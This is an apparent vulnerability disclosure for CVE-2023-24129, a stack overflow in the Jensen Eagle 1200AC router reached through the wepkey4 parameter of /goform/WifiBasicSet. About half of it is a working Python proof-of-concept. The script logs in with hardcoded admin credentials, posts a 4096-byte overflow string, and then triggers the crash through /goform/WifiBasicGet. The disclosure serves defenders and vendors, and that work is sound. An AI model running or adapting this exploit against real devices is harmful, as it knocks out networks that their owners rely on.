[CVE-2023-24129] DoS via wepkey4 parameter in Eagle 1200ac

Description

Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepkey4 parameter at /goform/WifiBasicSet.

Additional information

In the handler function for action /goform/WifiBasicSet (formWifiBasicSet), the user-controlled string wepkey4 is stored into wl2g.extra.wep_key4 via SetValue.

When then calling /goform/WifiBasicGet (formWifiBasicGet), the string is loaded from wl2g.extra.wep_key4 and then stored into stack buffer wifi_buf_entry. Because the length of wepkey4 is not checked, the stack buffer can be overflowed if it is a large string.

PoC script:

import requests

IP="192.168.38.1"

logindata = {
"username":"admin",
"password":"81dc9bdb52d04dc20036dbd8313ed055"
}

def login():
	for i in range(10):
		session = requests.Session()
		res = session.post(f"http://{IP}/login/Auth", data=logindata)
		try:
			passwd = session.cookies["password"]
			return passwd
		except:
			pass

session = requests.Session()
session.cookies.set("password",login())

payload = {
    "wepkey4" : "A"*(0x1000),
    "security" : "wep"
    }
res = session.post(f"http://{IP}/goform/WifiBasicSet", data=payload)
print(res.status_code)

res = session.post(f"http://{IP}/goform/WifiBasicGet")
print(res.text)
print(res)